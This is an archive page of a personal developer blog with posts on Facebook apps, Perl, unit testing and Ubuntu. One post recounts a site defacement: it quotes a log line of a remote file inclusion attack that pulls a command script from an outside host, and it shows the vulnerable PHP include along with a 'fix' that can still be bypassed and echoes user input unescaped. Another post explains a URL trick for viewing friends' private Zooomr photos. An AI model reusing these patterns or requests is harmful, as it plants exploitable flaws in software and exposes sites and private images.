Archive for the 'Code' Category

Things to know about writing Facebook applications

Published
by
jonh
on Thursday, November 29, 2007
in Code, Rants, brain dumps and zooomr
. Comments

From writing my little [Zooomr RSS Reader Facebook application] I believe there are a few things that developers need to be aware of that aren’t immediately obvious.

  1. The application you write is hosted on your server not Facebook!

    Facebook secretly includes the PHP (or whatever) pages under the covers, so http://apps.facebook.com/zooomr_rss_reader is actually mostly http://facebook.bluemonki.net/zooomr/index.php5 with some surrounding Facebook stuff.

  2. The Facebook profile page is static!

    Yeah you heard me it’s static. No it does not make calls to your server when people see it. Think about it, I don’t have that many Facebook apps on my profile but it’s got to be at least 10 different sections - which as we now know means 10 calls to 10 different webservers - which means it would suck, hard.

    The way it works is that you have a cron job (a job that runs every 30 minutes or so) that inserts data into a users profile page using the Facebook API in PHP (or whatever).

  3. You need to look after users data!

    This is kind of an addendum to point 1 and point 2. Lets use an example to make this clearer:

    • For my Zooomr app I need to store peoples Zooomr username
    • In order to insert stuff into their profile page I also need their Facebook ID
    • This means I have to store a (MYSQL) database of Facebook ID’s against Zooomr ID’s and look after it.

    It’s not that much of a big deal, but it seems a little strange. I guess if you do annoying things with someones Facebook ID - write crap on their profile page, send them messages etc - then they’ll just remove your app. Still weird.

So there we go, the 3 main gotchas about writing Facebook applications, at least as far as I was concerned - maybe you’ve had a different experience? Maybe you don’t care. Maybe your cat just died! I strongly doubt any of the above will help with the cat dying, but you never know.

Now that I’ve felt I’ve contributed in a constructive fashion here’s a few things that really got on my b-cups about the whole thing.

  1. No love for BETA

    Developers like to test things before they release them to the world at large. Now initially this is really easy - cos when you’re developing your app you can tick a magical box that says ‘only let developers of this app add it’.

    Great. The problem happens when version 1 of your amazing cat based app is out and you’re working on version 1.1. Lots of people have 1.0 installed, so you can’t just go and change the code running on your server willy nilly, and you can’t change the application end points on Facebook cos that will change it for everyone. So basically you need to create another application in order to have a developer stream of your app and a production stream. PAIN IN THE ASS!

  2. GOD DAMN INFINITE SESSION KEYS!!

    OK so this is all about point 2 - the magical cron script that updates peoples profile pages. To do this you need a valid (PHP) session key. You get one of these when you log into Facebook but it expires after 2 days which is why the infinite session key is useful - it never expires!

    Getting one though is harder than it would first seem - this is the procedure I went through to get one:

    1. Uninstall the app you’re writing from your account
    2. Install another browser (safari is good for Windows types)
    3. [Create the get_infinite_session_key.php5 file described on the Facebook developers wiki]
    4. Visit the page in your new browser and don’t forget to tick the box that says ‘remember my id’
    5. That’s the number!! KEEP IT SAFE!

    Phew!

OK so I think I’ve covered both sides of the things that bothered me about Facebook apps and I hope I’ve instilled some pearls of wisdom to your good selves, now get back to work!

Technorati , , , , , , , , , ,

Zooomr RSS Reader for Facebook

Published
by
jonh
on Wednesday, October 10, 2007
in Code and photos
. Comments

Well my first [facebook] application is done.

Behold [Zooomr RSS Reader!]

Zooomr RSS reader 0.5.0

Technorati , , , ,

Emoticons in Gaim/Pidgin are nuts!!

Published
by
jonh
on Thursday, April 26, 2007
in Code
. Comments
Emoticons in Gaim are nutsEmoticons in Gaim are nuts Hosted on Zooomr

Try reading that!!

Well at least [it's open source] :)

[Ticket created :)]

Technorati , , , ,

Zooomr MKIII sneak peek!!

Published
by
jonh
on Monday, April 16, 2007
in Code and FYI
. Comments

Ok so due to a little bug in [Zooomr] you can see your friends private images as long as you can see a preview of them. You can see previews by looking at the welcome mat page.

If you click on an image that’s private you’ll get the “Hmmm you’re looking for something that’s not here” page. But if you right click and choose “View Image” then you’ll see the small preview in it’s own window with it’s direct URL.

The URL will look something like this:

http://static.zooomr.com/images/976850_edf16793e5_s.jpg

Note the _s at the end - it means small. So delete the _s and see the original image!!

Check it out

Zooomr MKIII Sneak Peak: marketplace
Zooomr MKIII Sneak Peak: marketplace
Zooomr MKIII Sneak Peek: exif stuff
Zooomr MKIII Sneak Peak: exif stuff

PS: shhh it’s a secret

*** UPDATE ***

Go check out [Come Across from some more Zooomr MKII info]

*** UPDATE 2***

Ahh the confusion that the internet (and automated spam filters) breeds, it was all a miss understanding.

Really sorry Raoul, feel free to think of a way to make it up to you…

Technorati , , , , , , , , ,

Ubuntu, a macbook and the hash key

Published
by
jonh
on Tuesday, April 10, 2007
in Code, brain dumps, linux and ubuntu
. Comments

In the default install of Ubuntu Feisty Fawn on an Apple Intel Macbook, the hash key doesn’t work.

This isn’t really a surprise because it barely works in OSX (Alt/Option 3).

To mimic this functionality in Ubuntu go to System -> Preferences -> Keyboard, choose the tab labeled Layout Options.

In the Third Level Choosers list tick the box named: Press Left Alt key to choose 3rd level.

Keyboard Preferences, UbuntuKeyboard Preferences, Ubuntu Hosted on Zooomr

Now you have the # (hash) key by pressing the Alt/Option button and 3 at the same time.

Alt + 3 = Hash (#)Alt + 3 = Hash (#) Hosted on Zooomr

This is pretty damn useful if you like doing include statements in C/C++ or writing comments in scripting languages like Perl, Ruby and PHP.

enjoy!

Technorati , , , , , , , , , , , , ,

Perl and PHP

Published
by
jonh
on Tuesday, March 13, 2007
in Code
. Comments

PHP has addslashes, Perl has quotemeta.

Remember that! It’ll automagically escape all special characters from a string, which is useful if you didn’t create that string :)

PS: I’m only writing this down as no one on the rest of the internet seems to have done so very clearly.

Technorati , , ,

Perl and I have issues

Published
by
jonh
on Thursday, October 26, 2006
in Code and Rants
. Comments

Part of my new Job at IBM involves writing test scripts in [Perl].

This of course means I have to learn [Perl], something which I have kept away from ever since I can remember.

I’m not actually being unreasonable about this given the [Perl] extracts I’ve seen on the net and stuff I’ve seen on mailing lists/news groups.

Here is a snippet that exemplifies the issue I have with [Perl]:

{{{($@, $!, $^E, $,, $/, $\, $^W) = @saved;package main; $^D = $^D | $DB::db_stop;
printf $DB::OUT “%vd”, $^V;;
}}}
{{{($@, $!, $^E, $,, $/, $\, $^W) = @saved;package main; $^D = $^D | $DB::db_stop;
;{eval { require PadWalker; PadWalker->VERSION(0.08) }or print $DB::OUT (”PadWalker module not found - please install\n”);do ‘dumpvar_epic.pm’ unless defined &dumpvar_epic::dumpvar_epic;defined &dumpvar_epic::dumpvar_epic or print $DB::OUT “dumpvar_epic.pl not available.\n”;my $h = eval { PadWalker::peek_my(2) };my @vars = split (’ ‘,”);$@ and $@ =~ s/ at .*//, print $DB::OUT ($@);my $savout = select($DB::OUT);dumpvar_epic::dumplex($_,$h->{$_},defined $option{dumpDepth} ? $option{dumpDepth} : -1,@vars) for sort keys %$h;print “E”;select($savout);};;
}}}
{{{($@, $!, $^E, $,, $/, $\, $^W) = @saved;package main; $^D = $^D | $DB::db_stop;
;{do ‘dumpvar_epic.pm’ unless defined &dumpvar_epic::dumpvar_epic;defined &dumpvar_epic::dumpvar_epic or print $DB::OUT “dumpvar_epic.pm not available.\n”;my $savout = select($DB::OUT);dumpvar_epic::dumpvar_epic();select($savout);};;
}}}

Nice huh? No it’s not. But if you have a good coding standard (which we do at IBM) then it’s not _actually_ that bad. So I’m over my first (and major) predudice.

But now that I know some Perl I have a new thing to hate!! [Perl] OO!!!

The trouble is that it works the same way as it does in PHP 4. Which basically means that the “this” reference (which is implicit in C++ and Java) is not implicit, and if you want to call a member function from within a member function you need to do:

$self->method

Which gets pretty tiresome.

Right that’s enough ranting for now. Back tomorrow to blog more about big blue

Technorati Tags: , , , , , ,

Using CxxTest for Unit Testing

Published
by
jonh
on Tuesday, September 5, 2006
in Code
. Comments

The project I’m currently working on is possibly the worst project I have _ever_ worked on. Not because it’s a bad idea - but because of the way we have to work on it.

There are 3 main parts:

  • Get an undocumented proprietary ArcIMS webservice (which no one knows anything about) to show some of our data
  • Add a button without access to the code
  • Add the new versions of a couple of our projects. This requires a conversion DLL as the interface to one has changed.

Gripes aside I’m currently working on the conversion DLL (as I’ve already beaten ArcIMS to a small bloody pulp with a large metal stick), more precisely on testing that it actually works.

I know the functions line up cos I’ve used dependancy walker so now it’s time for function testing and this is where the interesting bit comes.

I’ve used a prewritten test harness!!

Yes. I am not going to re-invent the wheel.

Anyways - on to the ‘review’.

[CxxTest] is great because it only uses source and header files - you don’t have to build it into a DLL at all (nice and portable).

The downside to this is that you need [Perl] but it’s not exactly tough to get hold of.

You basically write tests as classes in header files with each test function prefixed by the word test. Eg

void testMe()

Will result in this function being called by the test harness but doing:

void doNotTestMe()

won’t.

All you need to do after that is to include a small piece of code in your pre-build step like the following:

C:\Perl\bin\perl -w cxxtestgen.pl –error-printer -o MainFunction.cpp TestFile1.hpp TestFile2.hpp

Where MainFunction.cpp is where you want main to end up and the TestFile*.hpp’s are your defined test classes.

Maybe you could define a clever macro do add the classes for you but it’s only a small project so I’m not really interested.

In conclusion I’ve found CxxTest to be excellent :)

Technorati Tags: , , ,

dapper drake

Published
by
jonh
on Sunday, April 9, 2006
in Code, FYI, Reviews and Testing
. Comments

I posted a [while ago] about the Airport Extreme driver for Linux being finished but not being capable of WEP (wireless encryption gubbins). Well since then I’ve wiped [Gentoo] off the old iBook and gone totally user friendly with [Ubuntu].

On installing the current stable version (Breezy Badger) I was dissapointed to see that the driver wasn’t yet supported (due to an older kernel). So I went crazy and downloaded the most recent tesing version [Dapper Drake (flight 6)].

Well what can I say, half way through the install I was asked which of my two network cards I wanted to use to check for updates. So now here I am sitting in the living room writing my blog from my 128bit WEP wireless connection under Ubuntu.

Seriously, if you have a few gig free on your drive you should check it out.

Technorati Tags: , , , , , ,

how the world was won

Published
by
jonh
on Thursday, April 6, 2006
in Code, FYI and Testing
. Comments

Ok so last week I got hacked by some previously mentioned turkish goat fuckers and I promised a run down of what happened, how and why. Oh and some revenge (mmm it tastes so good).

Ok so first off my buddy marc tells me that my site has been hacked, while I was sitting at home watching the tele and idley browsing the interweb on my iBook. So I potter over to [bluemonki.net] (that was a shameful self plug - sorry) to see [this!!].

Holy shit, I really had been hacked!!!

Anyhoo I spend the next 5 minutes checking through the SSH access logs and the changes log only to find nothing there. Then I start a quick search through the web server access log and find the following POST requests at exactly the same time as the file modification date:

85.98.221.59 - - [02/Apr/2006:07:19:14 -0400] “POST /index.php?page=http%3A%2F%2Fbarikat.org%2Fpartizan.txt%3Fcmd%3Did&&s=r& HTTP/1.1″ 200 7531 “http://beta.bluemonki.net/index.php?page=http%3A%2F%2Fbarikat.org%2Fpartizan.txt%3Fcmd%3Did&&s=r&cmd=edit&file=./index.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SIMBAR Enabled)”

Now this might look harmless, but in order to keep the front page looking the same while you persuse my online musings I wrote a little PHP script that included the requested page in the original page. That’s great but I did it like this:

< ?php
if (isset($_REQUEST['page']))
{
include($_REQUEST['page']);
}
else
{
include('http://www.bluemonki.net/wordpress/index.php');
}
?>

What’s wrong with that I hear you ask, well I’m not actually checking that the included page is one of mine!! And if you dig a little deeper into the access log you’ll see that the included page is this one:

http%3A%2F%2Fbarikat.org%2Fpartizan.txt

You can see it [here] (don’t worry it’s perfectly safe) *** Update this has been removed/suspended ***

This basically let goat fucker boy edit my index.php file :@ You can see GFB showing his glory to his fellow GF’s [here] (this is also perfectly safe but it’s in turkish) *** Update this is gone too ***

So I’ve now updated my include script to look like this:

< ?php if (isset($_REQUEST['page']))
{
// check that this page belongs to me
$array = explode("bluemonki.net", $_REQUEST['page']);
$test_string = $array[0];
if (0 == strcasecmp("http://www.", $test_string))
{
include($_REQUEST['page']);
}
else
{
// log the IP address and address
$domain = GetHostByName($REMOTE_ADDR);
$domain = GetHostByName($REMOTE_ADDR);
$handle = fopen("/home/bluemonk/log.txt", "a");
$today = date("Ymd:H:i:s");
fwrite($handle, chr(10) . chr(13));
fwrite($handle, $today . " ");
fwrite($handle, $domain . " ");
fwrite($handle, $_REQUEST['page']); echo "Naughty naughty! - consider your IP logged";
echo $domain . " ";
echo "Oh and I'll be taking a look at: ";
echo $_REQUEST['page'];
}
}
else
{
include('http://www.bluemonki.net/wordpress/index.php');
}
?>

So now if you try [POST example] you’ll find that it tells you to get stuffed and logs your IP at the same time. Neat eh? Yeah I thought so too.

That’s the how, next comes the revenge!!!

laterz

Technorati Tags: , , , , ,